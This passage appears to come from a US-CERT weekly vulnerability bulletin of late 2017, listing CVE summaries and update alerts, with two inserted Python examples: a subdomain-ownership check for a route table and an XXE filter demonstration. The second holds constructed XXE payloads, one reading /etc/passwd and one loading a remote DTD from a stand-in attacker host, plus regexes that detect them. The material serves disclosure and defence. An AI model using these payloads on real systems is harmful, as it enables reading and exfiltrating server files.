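from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Route:
    host: str    # e.g. "shop" (may be empty for the bare domain)
    domain: str  # e.g. "apps.example.com" (shared or private domain)
    owner: str   # "org/space" that registered the route (assumed format)

    @property
    def fqdn(self) -> str:
        return f"{self.host}.{self.domain}" if self.host else self.domain


class RouteTable:
    """Registry of routes; strict=False reproduces the weak check, strict=True the hardened one."""

    def __init__(self, strict: bool = True) -> None:
        self.strict = strict
        self.routes: List[Route] = []

    def conflicting_route(self, new: Route) -> Optional[Route]:
        """Return a route owned by someone else that `new` duplicates or nests under."""
        new_labels = new.fqdn.lower().split(".")
        for existing in self.routes:
            if existing.owner == new.owner:
                continue  # an org may freely nest under its own routes
            ex_labels = existing.fqdn.lower().split(".")
            if new_labels == ex_labels:
                return existing  # exact duplicate: rejected in both modes
            # Subdomain test on whole DNS labels: new must be strictly longer and
            # end with every label of the existing route.
            if (self.strict
                    and len(new_labels) > len(ex_labels)
                    and new_labels[-len(ex_labels):] == ex_labels):
                return existing
        return None

    def register(self, host: str, domain: str, owner: str) -> Route:
        new = Route(host, domain, owner)
        clash = self.conflicting_route(new)
        if clash is not None:
            raise PermissionError(
                f"{new.fqdn} conflicts with {clash.fqdn} owned by {clash.owner}")
        self.routes.append(new)
        return new


if __name__ == "__main__":
    # Constructed scenario: org-a owns shop.apps.example.com, org-b tries to sit under it.
    weak = RouteTable(strict=False)
    weak.register("shop", "apps.example.com", "org-a/prod")
    print("weak check allowed:", weak.register("api", "shop.apps.example.com", "org-b/dev").fqdn)

    hardened = RouteTable(strict=True)
    hardened.register("shop", "apps.example.com", "org-a/prod")
    try:
        hardened.register("api", "shop.apps.example.com", "org-b/dev")
    except PermissionError as err:
        print("hardened check refused:", err)
```

The check runs at registration time against every existing route, so an attacker who can create domains or hosts in another org still cannot obtain a name that resolves under a victim's application; the same-owner exemption keeps legitimate nested routes working.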
pivotal -- cloud_foundry
In Cloud Foundry Foundation cf-deployment v0.35.0, a misconfiguration with Loggregator and syslog-drain causes logs to be drained to unintended locations.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-14390
Source and patch info: BID, CONFIRM

pivotal -- cloud_foundry
In Cloud Foundry Foundation Credhub-release version 1.1.0, access control lists (ACLs) enforce whether an authenticated user can perform an operation on a credential. For installations using ACLs, the ACL was bypassed for the CredHub interpolate endpoint, allowing authenticated applications to view any credential within the CredHub installation.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-8038
Source and patch info: CONFIRM

pivotal -- cloud_foundry
An issue was discovered in Cloud Foundry Foundation cf-release (all versions prior to v279) and UAA (30.x versions prior to 30.6, 45.x versions prior to 45.4, 52.x versions prior to 52.1). In some cases, the UAA allows an authenticated user for a particular client to revoke client tokens for other users on the same client. This occurs only if the client is using opaque tokens or JWT tokens validated using the check_token endpoint. A malicious actor could cause denial of service.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-8031
Source and patch info: BID, CONFIRM

pivotal -- spring-LDAP
In Pivotal Spring-LDAP versions 1.3.0 through 2.3.1, when connected to some LDAP servers, when no additional attributes are bound, and when using LDAP BindAuthenticator with org.springframework.ldap.core.support.DefaultTlsDirContextAuthenticationStrategy as the authentication strategy and setting userSearch, authentication is allowed with an arbitrary password when the username is correct. This occurs because some LDAP vendors require an explicit operation for the LDAP bind to take effect.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-8028
Source and patch info: CONFIRM, DEBIAN

pivotal -- spring_security
An issue was discovered in Pivotal Spring Security 4.2.0.RELEASE through 4.2.2.RELEASE, and Spring Security 5.0.0.M1. When configured to enable default typing, Jackson contained a deserialization vulnerability that could lead to arbitrary code execution. Jackson fixed this vulnerability by blacklisting known "deserialization gadgets." Spring Security configures Jackson with global default typing enabled, which means that (through the previous exploit) arbitrary code could be executed if all of the following are true: (1) Spring Security's Jackson support is being leveraged by invoking SecurityJackson2Modules.getModules(ClassLoader) or SecurityJackson2Modules.enableDefaultTyping(ObjectMapper); (2) Jackson is used to deserialize data that is not trusted (Spring Security does not perform deserialization using Jackson, so this is an explicit choice of the user); and (3) there is an unknown (not already blacklisted by Jackson) "deserialization gadget" that allows code execution present on the classpath. Jackson provides a blacklisting approach to protecting against this type of attack, but Spring Security should be proactive about blocking unknown "deserialization gadgets" when Spring Security enables default typing.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-4995
Source and patch info: BID, CONFIRM

pivotal -- spring
An issue was discovered in Pivotal Spring Web Flow through 2.4.5. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property, which is disabled by default (i.e., set to 'false'), can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings. NOTE: this issue exists because of an incomplete fix for CVE-2017-4971.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-8039
Source and patch info: BID, CONFIRM

pivotal -- spring
In Pivotal Spring AMQP versions prior to 1.7.4, 1.6.11, and 1.5.7, an org.springframework.amqp.core.Message may be unsafely deserialized when being converted into a string. A malicious payload could be crafted to exploit this and enable a remote code execution attack.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-8045
Source and patch info: BID, CONFIRM

piwigo -- piwigo
Piwigo is affected by an SQL injection vulnerability in version 2.9.2 and possibly prior. This vulnerability allows remote authenticated attackers to obtain information in the context of the database user the application uses to retrieve data. tags.php is affected: values of the edit_list parameter are not sanitized; they are used to construct an SQL query that retrieves a list of users registered in the application.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-16893
Source and patch info: MISC

princeton -- ptw-wms1
PTW-WMS1 firmware version 2.000.012 allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10902
Source and patch info: JVN

princeton -- ptw-wms1
PTW-WMS1 firmware version 2.000.012 allows remote attackers to bypass access restrictions to obtain or delete data on the disk via unspecified vectors.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10900
Source and patch info: JVN

princeton -- ptw-wms1
Improper authentication issue in PTW-WMS1 firmware version 2.000.012 allows remote attackers to log in to the device with root privileges and conduct arbitrary operations via unspecified vectors.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10903
Source and patch info: JVN

princeton -- ptw-wms1
Buffer overflow in PTW-WMS1 firmware version 2.000.012 allows remote attackers to conduct denial-of-service attacks via unspecified vectors.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10901
Source and patch info: JVN

qualitysoft -- qnd
Directory traversal vulnerability in QND Advance/Standard allows an attacker to read arbitrary files via a specially crafted command.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10861
Source and patch info: CONFIRM, MISC

restlet -- restlet_framework
Restlet Framework before 2.3.11, when using SimpleXMLProvider, allows remote attackers to access arbitrary files via an XXE attack in a REST API HTTP request. This affects use of the Jax-rs extension.
Published: 2017-11-30 | CVSS score: not yet calculated | CVE-2017-14868
Source and patch info: MISC, MISC, MISC

restlet -- restlet_framework
Restlet Framework before 2.3.12 allows remote attackers to access arbitrary files via a crafted REST API HTTP request that conducts an XXE attack, because only general external entities (not parameter external entities) are properly considered. This is related to XmlRepresentation, DOMRepresentation, SaxRepresentation, and JacksonRepresentation.
Published: 2017-11-30 | CVSS score: not yet calculated | CVE-2017-14949
Source and patch info: MISC, MISC
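Added example (not from this bulletin and not Restlet's code): a pre-parse check over an untrusted XML body that shows the gap the CVE-2017-14949 entry describes. The naive check looks only for external general entities, so a DOCTYPE that pulls in an external DTD through a parameter entity passes it; the hardened check rejects any DOCTYPE at all, which is the right policy for a REST API that never needs a DTD. The regexes are this example's own, the payloads are constructed, and attacker.example is a fictitious host.

```python
import re
from xml.etree import ElementTree as ET

# External entity declarations in a DOCTYPE internal subset:
#   general entity:    <!ENTITY xxe SYSTEM "file:///etc/passwd">
#   parameter entity:  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
GENERAL_EXTERNAL = re.compile(r'<!ENTITY\s+([A-Za-z_][\w.\-]*)\s+(?:SYSTEM|PUBLIC)\b')
PARAMETER_EXTERNAL = re.compile(r'<!ENTITY\s+%\s+([A-Za-z_][\w.\-]*)\s+(?:SYSTEM|PUBLIC)\b')
DOCTYPE = re.compile(r'<!DOCTYPE\b')


def external_entities(doc: str) -> dict:
    """Names of the external general and parameter entities a document declares."""
    return {
        "general": GENERAL_EXTERNAL.findall(doc),
        "parameter": PARAMETER_EXTERNAL.findall(doc),
    }


def naive_is_safe(doc: str) -> bool:
    """The flawed policy: only general external entities are considered."""
    return GENERAL_EXTERNAL.search(doc) is None


def is_safe(doc: str) -> bool:
    """Hardened policy: a REST payload never needs a DTD, so any DOCTYPE is rejected."""
    return DOCTYPE.search(doc) is None


def parse_untrusted(doc: str) -> ET.Element:
    """Parse a request body only after the DTD check passes."""
    if not is_safe(doc):
        raise ValueError("document declares a DOCTYPE; refusing to parse")
    return ET.fromstring(doc)


# Constructed payloads (not taken from the advisory).
GENERAL_XXE = """<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<r>&xxe;</r>"""

PARAMETER_XXE = """<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<r>x</r>"""

CLEAN = """<?xml version="1.0"?><r><name>alice</name></r>"""

if __name__ == "__main__":
    for label, doc in (("general", GENERAL_XXE), ("parameter", PARAMETER_XXE), ("clean", CLEAN)):
        print(f"{label:9s} entities={external_entities(doc)} "
              f"naive_safe={naive_is_safe(doc)} safe={is_safe(doc)}")
```

The parameter-entity payload is the interesting one: the internal subset itself reads nothing, but "%dtd;" makes the parser fetch the attacker's DTD, which can in turn declare entities that read a local file and send it out. A filter that matches only the general form therefore passes it, and the only robust policy for untrusted input is to refuse DTDs entirely (or to configure the parser so external entities and external DTD loading are disabled) rather than to pattern-match declarations.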
samba -- samba
Use-after-free vulnerability in Samba 4.x before 4.7.3 allows remote attackers to execute arbitrary code via a crafted SMB1 request.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-14746
Source and patch info: BID, SECTRACK, UBUNTU, REDHAT, REDHAT, REDHAT, DEBIAN, CONFIRM

samba -- samba
Samba before 4.7.3 might allow remote attackers to obtain sensitive information by leveraging the server's failure to clear allocated heap memory.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-15275
Source and patch info: BID, SECTRACK, UBUNTU, UBUNTU, REDHAT, REDHAT, REDHAT, DEBIAN, CONFIRM

samsung/seagate -- drives
Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when used on Windows and operating in Opal mode on Lenovo ThinkPad T440s laptops with BIOS 2.32 or ThinkPad W541 laptops with BIOS 2.21, or in Opal or eDrive mode on Dell Latitude E6410 laptops with BIOS A16 or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by triggering a soft reset and booting from an alternative OS, aka a "Forced Restart Attack."
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2015-7268
Source and patch info: MISC, MISC

samsung/seagate -- drives
Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when in sleep mode and operating in Opal or eDrive mode on Lenovo ThinkPad T440s laptops with BIOS 2.32; ThinkPad W541 laptops with BIOS 2.21; Dell Latitude E6410 laptops with BIOS A16; or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by leveraging failure to detect when SATA drives are unplugged in sleep mode, aka a "Hot Plug Attack."
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2015-7267
Source and patch info: MISC, MISC

seagate -- st500lt015_drives
Seagate ST500LT015 hard disk drives, when operating in eDrive mode on Lenovo ThinkPad W541 laptops with BIOS 2.21, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by attaching a second SATA connector to exposed pins, maintaining an alternate power source, and attaching the data cable to another machine, aka a "Hot Unplug Attack."
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2015-7269
Source and patch info: MISC, MISC

sony -- media_go
Untrusted search path vulnerability in Media Go version 3.2.0.191 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10891
Source and patch info: JVN

sony -- music_center_for_pc
Untrusted search path vulnerability in Music Center for PC version 1.0.00 allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10892
Source and patch info: JVN

splunk -- splunk_enterprise
Splunk Web in Splunk Enterprise 7.0.x before 7.0.0.1, 6.6.x before 6.6.3.2, 6.5.x before 6.5.6, 6.4.x before 6.4.9, and 6.3.x before 6.3.12, when the SAML authType is enabled, mishandles SAML, which allows remote attackers to bypass intended access restrictions or conduct impersonation attacks.
Published: 2017-11-29 | CVSS score: not yet calculated | CVE-2017-17067
Source and patch info: BID, CONFIRM

squiz -- matrix
An issue was discovered in Squiz Matrix before 5.3.6.1 and 5.4.x before 5.4.1.3. There are multiple reflected cross-site scripting (XSS) issues in Matrix WYSIWYG plugins.
Published: 2017-11-29 | CVSS score: not yet calculated | CVE-2017-14197
Source and patch info: MISC

squiz -- matrix
An issue was discovered in Squiz Matrix before 5.3.6.1 and 5.4.x before 5.4.1.3. Authenticated users with permissions to edit design assets can cause remote code execution (RCE) via a maliciously crafted time_format tag.
Published: 2017-11-29 | CVSS score: not yet calculated | CVE-2017-14198
Source and patch info: MISC

squiz -- matrix
An issue was discovered in Squiz Matrix from 5.3 through 5.3.6.1 and 5.4.1.3. An information disclosure caused by a path traversal issue in the 'File Bridge' plugin allowed the existence of files outside of the bridged path to be confirmed.
Published: 2017-11-29 | CVSS score: not yet calculated | CVE-2017-14196
Source and patch info: MISC

stalker_software -- communigate_pro
The WebMail components (Crystal, pronto, and pronto4) in CommuniGate Pro before 6.2.1 have stored XSS vulnerabilities via (1) the location or details field of a Google Calendar invitation, (2) a crafted Outlook.com calendar (aka Hotmail Calendar) invitation, (3) e-mail granting access to a directory that has JavaScript in its name, (4) JavaScript in a note name, (5) JavaScript in a task name, or (6) HTML e-mail that is mishandled in the Inbox component.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-16962
Source and patch info: MISC, EXPLOIT-DB

swagger-parser -- swagger-parser
A vulnerability in the YAML parsing functionality of Swagger-Parser versions <= 1.0.30 and Swagger Codegen versions <= 2.2.2 results in arbitrary code being executed when a maliciously crafted YAML OpenAPI specification is parsed. This in particular affects the 'generate' and 'validate' commands in swagger-codegen (<= 2.2.2) and can lead to arbitrary code being executed when these commands are used on a crafted YAML specification.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-1000207
Source and patch info: CONFIRM

teampass -- teampass
TeamPass before 2.1.27.9 does not properly enforce item access control when requesting items.queries.php. It is then possible to copy any arbitrary item into a directory controlled by the attacker, edit any item within a read-only directory, delete an arbitrary item, delete the file attachments of an arbitrary item, copy the password of an arbitrary item to the copy/paste buffer, access the history of an arbitrary item, and edit attributes of an arbitrary directory. To exploit the vulnerability, an authenticated attacker must tamper with the requests sent directly, for example by changing the "item_id" parameter when invoking "copy_item" on items.queries.php.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-15055
Source and patch info: MISC, MISC

teampass -- teampass
TeamPass before 2.1.27.9 does not properly enforce manager access control when requesting users.queries.php. It is then possible for a manager user to delete an arbitrary user (including admin), or modify attributes of any arbitrary user except administrator. To exploit the vulnerability, an authenticated attacker must have manager rights on the application, then tamper with the requests sent directly, for example by changing the "id" parameter when invoking "delete_user" on users.queries.php.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-15052
Source and patch info: MISC, MISC

teampass -- teampass
An arbitrary file upload vulnerability, present in TeamPass before 2.1.27.9, allows remote authenticated users to upload arbitrary files, leading to remote command execution. To exploit this vulnerability, an authenticated attacker has to tamper with parameters of a request to upload.files.php in order to select the correct branch and be able to upload any arbitrary file. From there, the attacker can simply access the file to execute code on the server.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-15054
Source and patch info: MISC, MISC

teampass -- teampass
TeamPass before 2.1.27.9 does not properly enforce manager access control when requesting roles.queries.php. It is then possible for a manager user to modify any arbitrary role within the application, or delete any arbitrary role. To exploit the vulnerability, an authenticated attacker must have manager rights on the application, then tamper with the requests sent directly, for example by changing the "id" parameter when invoking "delete_role" on roles.queries.php.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-15053
Source and patch info: MISC, MISC

teampass -- teampass
Multiple stored cross-site scripting (XSS) vulnerabilities in TeamPass before 2.1.27.9 allow authenticated remote attackers to inject arbitrary web script or HTML via (1) the URL value of an item or (2) the user log history. To exploit the vulnerability, the attacker must first be authenticated to the application. For the first one, the attacker simply injects XSS code within the URL field of a shared item. For the second one, the attacker must prepare a payload within their profile and then ask an administrator to modify that profile; from there, the payload executes whenever the administrator accesses the log.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-15051
Source and patch info: MISC, MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via a NULL value in a 0x82730020 DeviceIoControl request to \\.\Viragtlt.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-17050
Source and patch info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via a NULL value in a 0x82730010 DeviceIoControl request to \\.\Viragtlt.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-17049
Source and patch info: MISC

tg_soft -- vir.it_explorer_lite
TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via a NULL value in a 0x82730008 DeviceIoControl request to \\.\Viragtlt.
Published: 2017-11-26 | CVSS score: not yet calculated | CVE-2017-16948
Source and patch info: MISC

tomoki_sanaki -- sdnsproxy.exe
sDNSProxy.exe ver1.1.0.0 and earlier allows remote attackers to cause a denial of service via unspecified vectors.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10895
Source and patch info: JVN

tomoki_sanaki -- streamrelay.net.exe
StreamRelay.NET.exe ver2.14.0.7 and earlier allows remote attackers to cause a denial of service via unspecified vectors.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-10894
Source and patch info: JVN

tp-link -- multiple_devices
TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the iface field of an admin/diagnostic command to cgi-bin/luci, related to the zone_get_effect_devices function in /usr/lib/lua/luci/controller/admin/diagnostic.lua in uhttpd.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-16957
Source and patch info: BID, MISC

tp-link -- multiple_devices
TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the t_bindif field of an admin/interface command to cgi-bin/luci, related to the get_device_byif function in /usr/lib/lua/luci/controller/admin/interface.lua in uhttpd.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-16960
Source and patch info: MISC

tp-link -- multiple_devices
The locale feature in cgi-bin/luci on TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allows remote authenticated users to test for the existence of arbitrary files by making an operation=write;locale=%0d request, and then making an operation=read request with a crafted Accept-Language HTTP header, related to the set_sysinfo and get_sysinfo functions in /usr/lib/lua/luci/controller/locale.lua in uhttpd.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-16959
Source and patch info: MISC

tp-link -- multiple_devices
TP-Link TL-WVR, TL-WAR, TL-ER, and TL-R devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the t_bindif field of an admin/bridge command to cgi-bin/luci, related to the get_device_byif function in /usr/lib/lua/luci/controller/admin/bridge.lua in uhttpd.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-16958
Source and patch info: MISC
vibease -- multiple_products
The Vibease Wireless Remote Vibrator app for Android and the Vibease Chat app for iOS use cleartext to exchange messages with other apps and the PLAIN SASL mechanism to send auth tokens to Vibease servers, which allows remote attackers to obtain user credentials, messages, and other sensitive information by sniffing the network for XMPP traffic.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-14486
Source and patch info: MISC

vim -- vim
fileio.c in Vim prior to 8.0.1263 sets the group ownership of a .swp file to the editor's primary group (which may be different from the group ownership of the original file), which allows local users to obtain sensitive information by leveraging an applicable group membership, as demonstrated by /etc/shadow owned by root:shadow mode 0640, but /etc/.shadow.swp owned by root:users mode 0640. This is a different vulnerability than CVE-2017-1000382.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-17087
Source and patch info: MISC, MISC, MISC, MISC

winamp -- winamp_pro
Winamp Pro 5.66 Build 3512 allows remote attackers to cause a denial of service via a crafted WAV, WMV, AU, ASF, AIFF, or AIF file.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-16951
Source and patch info: EXPLOIT-DB

wireshark -- wireshark
In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the NetBIOS dissector could crash. This was addressed in epan/dissectors/packet-netbios.c by ensuring that write operations are bounded by the beginning of a buffer.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-17083
Source and patch info: CONFIRM, CONFIRM, CONFIRM

wireshark -- wireshark
In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the IWARP_MPA dissector could crash. This was addressed in epan/dissectors/packet-iwarp-mpa.c by validating a ULPDU length.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-17084
Source and patch info: CONFIRM, CONFIRM, CONFIRM

wireshark -- wireshark
In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the CIP Safety dissector could crash. This was addressed in epan/dissectors/packet-cipsafety.c by validating the packet length.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-17085
Source and patch info: CONFIRM, CONFIRM, CONFIRM

wordpress -- wordpress
wp-admin/user-new.php in WordPress before 4.9.1 sets the newbloguser key to a string that can be directly derived from the user ID, which allows remote attackers to bypass intended access restrictions by entering this string.
Published: 2017-12-02 | CVSS score: not yet calculated | CVE-2017-17091
Source and patch info: MISC, MISC, MISC

wordpress -- wordpress
XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
Published: 2017-11-29 | CVSS score: not yet calculated | CVE-2017-17059
Source and patch info: MISC, MISC

wordpress -- wordpress
wp-includes/feed.php in WordPress before 4.9.1 does not properly restrict enclosures in RSS and Atom fields, which might allow attackers to conduct XSS attacks via a crafted URL.
Published: 2017-12-02 | CVSS score: not yet calculated | CVE-2017-17094
Source and patch info: MISC, MISC, MISC

wordpress -- wordpress
The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the "post" parameter to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-17043
Source and patch info: MISC, MISC, MISC

wordpress -- wordpress
The WooCommerce plugin through 3.x for WordPress has a directory traversal vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory.
Published: 2017-11-29 | CVSS score: not yet calculated | CVE-2017-17058
Source and patch info: EXPLOIT-DB, MISC

wordpress -- wordpress
wp-includes/functions.php in WordPress before 4.9.1 does not require the unfiltered_html capability for upload of .js files, which might allow remote attackers to conduct XSS attacks via a crafted file.
Published: 2017-12-02 | CVSS score: not yet calculated | CVE-2017-17092
Source and patch info: MISC, MISC, MISC

wordpress -- wordpress
wp-includes/general-template.php in WordPress before 4.9.1 does not properly restrict the lang attribute of an HTML element, which might allow attackers to conduct XSS attacks via the language setting of a site.
Published: 2017-12-02 | CVSS score: not yet calculated | CVE-2017-17093
Source and patch info: MISC, MISC, MISC

wordpress -- wordpress
SQL injection vulnerability in the InLinks plugin through 1.1 for WordPress allows authenticated users to execute arbitrary SQL commands via the "keyword" parameter to /wp-admin/options-general.php?page=inlinks/inlinks.php.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-16955
Source and patch info: MISC, MISC

xen_project -- xen
An issue was discovered in Xen through 4.9.x allowing HVM guest OS users to gain privileges on the host OS, obtain sensitive information, or cause a denial of service (BUG and host OS crash) by leveraging the mishandling of Populate on Demand (PoD) Physical-to-Machine (P2M) errors.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-17045
Source and patch info: BID, SECTRACK, CONFIRM, CONFIRM

xen_project -- xen
An issue was discovered in Xen through 4.9.x on the ARM platform allowing guest OS users to obtain sensitive information from DRAM after a reboot, because disjoint blocks, and physical addresses that do not start at zero, are mishandled.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-17046
Source and patch info: CONFIRM

xen_project -- xen
An issue was discovered in Xen through 4.9.x allowing HVM guest OS users to cause a denial of service (infinite loop and host OS hang) by leveraging the mishandling of Populate on Demand (PoD) errors.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-17044
Source and patch info: BID, SECTRACK, CONFIRM, CONFIRM

xiphux -- gitphp
GitPHP by xiphux is vulnerable to OS command injection.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-1000214
Source and patch info: CONFIRM, CONFIRM

yard -- yard
lib/yard/core_ext/file.rb in the server in YARD before 0.9.11 does not block relative paths with an initial ../ sequence, which allows attackers to conduct directory traversal attacks and read arbitrary files.
Published: 2017-11-28 | CVSS score: not yet calculated | CVE-2017-17042
Source and patch info: CONFIRM

zte_corporation -- zxdsl_831cii_devices
connoppp.cgi on ZTE ZXDSL 831CII devices does not require HTTP Basic Authentication, which allows remote attackers to modify the PPPoE configuration or set up a malicious configuration via a GET request.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-16953
Source and patch info: MISC, EXPLOIT-DB

zulip -- server
In Zulip Server before 1.7.1, on a server with multiple realms, a vulnerability in the invitation system lets an authorized user of one realm on the server create a user account on any other realm.
Published: 2017-11-27 | CVSS score: not yet calculated | CVE-2017-0910
Source and patch info: CONFIRM, CONFIRM

This product is provided subject to this Notification and this Privacy & Use policy.


Apache Software Foundation Releases Security Updates

Original release date: December 04, 2017

The Apache Software Foundation has released security updates to address vulnerabilities in Apache Struts versions 2.5 to 2.5.14. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Apache Security Bulletins S2-054 and S2-055 and upgrade to Struts 2.5.14.1.


This product is provided subject to this Notification and this Privacy & Use policy.


Mozilla Releases Security Update for Firefox

Original release date: December 04, 2017

Mozilla has released a security update to address multiple vulnerabilities in Firefox 57. A remote attacker could exploit these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Mozilla Security Advisory for Firefox 57.0.1 and apply the necessary update.


This product is provided subject to this Notification and this Privacy & Use policy.


Securing Mobile Devices During Holiday Travel

Original release date: December 05, 2017

As the holiday season begins, many people will travel with their mobile devices. Although these devices—such as smart phones, tablets, and laptops—offer a range of conveniences, users should be mindful of potential threats and vulnerabilities while traveling with them.

US-CERT encourages users to review the US-CERT Tips on Holiday Traveling with Personal Internet-Enabled Devices and Cybersecurity for Electronic Devices. The suggested security practices in these tips will help travelers secure their portable devices during the holiday season and throughout the year.


This product is provided subject to this Notification and this Privacy & Use policy.


Google Releases Security Update for Chrome

Original release date: December 06, 2017

Google has released Chrome version 63.0.3239.84 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

US-CERT encourages users and administrators to review the Chrome Releases page and apply the necessary update.


This product is provided subject to this Notification and this Privacy & Use policy.


Apple Releases Security Updates

Original release date: December 06, 2017

Apple has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Apple security pages for the following products and apply the necessary updates:


This product is provided subject to this Notification and this Privacy & Use policy.


Microsoft Releases Security Updates for its Malware Protection Engine

Original release date: December 07, 2017

Microsoft has released updates to address a vulnerability in Microsoft Malware Protection Engine affecting multiple products. A remote attacker could exploit this vulnerability to take control of an affected system.

US-CERT encourages users and administrators to review Microsoft's Advisory and apply the necessary updates.





Mozilla Releases Security Updates

Original release date: December 07, 2017

Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. A remote attacker could exploit these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Mozilla Security Advisory for Firefox 57.0.2 and ESR 52.5.2 and apply the necessary updates.




SB17-345: Vulnerability Summary for the Week of December 4, 2017

Original release date: December 11, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

